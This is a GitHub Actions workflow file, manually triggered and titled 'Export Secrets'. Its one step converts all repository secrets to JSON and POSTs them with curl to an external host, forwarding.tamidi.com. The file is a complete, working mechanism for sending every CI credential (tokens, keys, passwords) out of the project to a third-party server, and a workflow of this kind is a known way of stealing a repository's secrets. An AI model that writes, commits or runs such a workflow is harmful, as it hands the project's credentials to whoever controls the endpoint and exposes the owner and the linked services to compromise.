name: Export Secrets
on:
  workflow_dispatch:

jobs:
  export-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Send secrets to HTTP endpoint
        env:
          SECRET_PAYLOAD: ${{ toJson(secrets) }}
        run: |
          curl -X POST "https://forwarding.tamidi.com/secrets" \
            -H "Content-Type: application/json" \
            -d "$SECRET_PAYLOAD"
